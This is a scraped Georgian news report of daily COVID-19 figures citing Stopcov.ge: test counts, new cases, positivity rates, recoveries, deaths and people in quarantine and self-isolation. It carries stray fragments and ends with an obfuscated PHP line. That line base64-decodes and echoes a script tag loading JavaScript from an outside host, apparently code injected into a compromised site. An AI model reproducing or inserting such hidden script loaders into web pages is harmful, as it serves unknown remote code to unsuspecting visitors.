celsiusi
ავერსი შნაიდერი
Stopcov.ge-ზე გამოქვეყნებული ინფორმაციის თანახმად, ინტენსიური ტესტირების ფარგლებში, ბოლო 24 საათში ქვეყნის მასშტაბით ჩატარდა 23 742 კვლევა ტესტით, მათ შორის 12 308 კვლევა ანტიგენის ტესტით და 11 434 PCR ტესტით.
 
ჩატარებული ტესტირების შედეგად, ბოლო 24 საათში გამოვლინდა ვირუსით ინფიცირების 968 ახალი დადასტურებული შემთხვევა. ქვეყანაში კოვიდ-19-ის პანდემიის გავრცელებიდან დღემდე გამოვლენილი დადასტურებული შემთხვევების საერთო რაოდენობა შეადგენს 330 375-ს.
 
რაც შეეხება დადებითობის მაჩვენებელს, 15 მაისის მდგომარეობით, დადებითობის დღიური მაჩვენებელი არის 4.08 %, ბოლო 14 დღის მანძილზე - 4.96%, ხოლო 7 დღის მანძილზე - 3.90%.
 
ბოლო 24 საათში ვირუსისგან გამოჯანმრთელდა 903 პირი, ხოლო ჯამში გამოჯანმრთელებულთა რაოდენობა გაიზარდა 308 821-მდე.
 
ბოლო 24 საათში კორონავირუსით გარდაცვალების 16 ახალი შემთხვევა დაფიქსირდა. პანდემიის გავრცელებიდან დღემდე ვირუსს ჯამში 4 442 პირი ემსხვერპლა.
 
საკარანტინე სივრცეებში მოთავსებულია 67 ადამიანი. 
 
სულ 6 ოქტომბრიდან - 15 მაისის პერიოდში, სახელმწიფო საზღვრიდან საკარანტინე სივრცეებში გადაყვანილია - 24 660 პირი.
 
ამ ეტაპისთვის თვითიზოლაციაში იმყოფება 25 597 ადამიანი, მათ შორის თბილისში - 17 233 პირი, აჭარაში - 1 599, იმერეთში - 1 719.
1137
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");